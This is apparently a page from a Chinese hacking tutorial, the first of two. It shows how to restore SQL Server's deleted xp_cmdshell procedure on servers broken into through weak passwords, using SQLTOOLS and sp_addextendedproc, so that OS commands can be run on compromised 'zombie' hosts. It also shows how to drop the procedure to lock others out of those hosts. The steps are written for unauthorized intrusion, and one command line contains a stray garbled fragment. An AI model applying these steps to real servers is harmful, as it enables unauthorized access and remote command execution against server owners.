|
扫到SQL弱口令后利用SQLTOOLS出现未能找到存储过程 ’master..xp_cmdshell’
这种情况的主要原因是删除了扩展存储过过程xp_cmdshell,有一个恢复的办法,如果不成功说明被改名了
使用SQLTOOLS连接,连接后在利用目录下点执行数据库命令,执行:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
运气好的话就成功了,如果你想让你的肉鸡用SQL执行不了DOS命令的话,执行:
sp_dropextendedproc "xp_cmdshell"
就执行不了DOS命令了,当然用上面的语句可以复原。
用SQLTOOLS可以连接成功,执行DOS命令,却总是显示这个、、、拒绝了对对象 ’xp_cmdshell’(数据库 ’master’,所有者 ’dbo’)的 EXECUTE 权限。
怎么解决????
上传文件也不行。。。
1 未能找到存储过程’master..xpcmdshell’。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int,
第二步执行:sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’,
然后按F5键命令执行完毕。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’
然后按F5键命令执行完毕。
[1] [2] 下一页 |
